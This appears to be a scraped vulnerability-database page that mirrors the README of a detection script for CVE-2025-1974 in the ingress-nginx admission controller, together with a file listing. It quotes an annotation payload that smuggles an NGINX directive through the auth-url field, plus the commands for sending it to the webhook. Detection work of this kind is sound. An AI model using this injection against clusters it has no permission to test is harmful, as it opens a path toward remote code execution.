来源

关联漏洞

描述

A minimal test tool to help detect annotation injection vulnerabilities in Kubernetes NGINX Ingress controllers. This script sends a crafted AdmissionReview request to simulate a potential exploit path from CVE-2025-1974 and checks for signs of misinterpreted annotations in controller logs.

介绍

# 🚨 Log Injection Test via Ingress-NGINX Admission Controller

## 🧠 Overview
This script tests for annotation injection vulnerabilities in Kubernetes clusters using the NGINX Ingress Controller. It is meant for **detection purposes only** in relation to [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974), which allows malicious annotations to influence NGINX configuration.

## 📚 Background
The vulnerability, disclosed by Wiz.io ([blog post](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)), involves injecting annotations that are improperly handled by the controller. For instance:

```yaml
nginx.ingress.kubernetes.io/auth-url: "http://placeholder/#; error_log /root/this_path_shouldnt_exist.log debug; #"
```

This can lead to unexpected NGINX configuration behavior and permission errors if processed. In more advanced scenarios, this type of injection could be chained with other misconfigurations to achieve **remote code execution (RCE)**.

## 🛠️ What This Script Does
1. Loads a crafted `AdmissionReview` payload from a YAML file.
2. Sends it to the admission controller's `/validate` endpoint.
3. Prompts the user to check ingress controller logs for results.

## 📁 Files
- `admission_review.yaml`: Contains the crafted AdmissionReview request.
- `main.py`: Sends the payload to the controller.

## 🚀 Usage
First, forward the admission controller port:

```bash
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```

Then run:

```bash
python main.py --url https://localhost:8443
```

## 🔍 Expected Result
Check ingress controller logs:

```bash
kubectl logs -n ingress-nginx -l app.kubernetes.io/component=controller
```

You may see:
```
nginx: [emerg] open() "/root/this_path_shouldnt_exist.log" failed (13: Permission denied)
```

This indicates the annotation was improperly executed as a directive.

## ⚠️ Warning
For **educational and authorized testing only**. Do not run on systems without permission.

## 🔗 References
- [Wiz Blog: Breaking Ingress NGINX](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)
- [NGINX Ingress Annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/)
- [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)

---
Use this tool to verify whether your cluster is vulnerable to annotation injection via NGINX Ingress. Exploitation of this vulnerability may be part of a broader attack chain leading to remote code execution.

文件快照

 [4.0K]  /data/pocs/d1bb4b8e135a42b14e973da1f6ed94ba108d46b4
├── [ 868]  admission_review.yaml
├── [1.3K]  main.py
└── [2.5K]  README.md

0 directories, 3 files

备注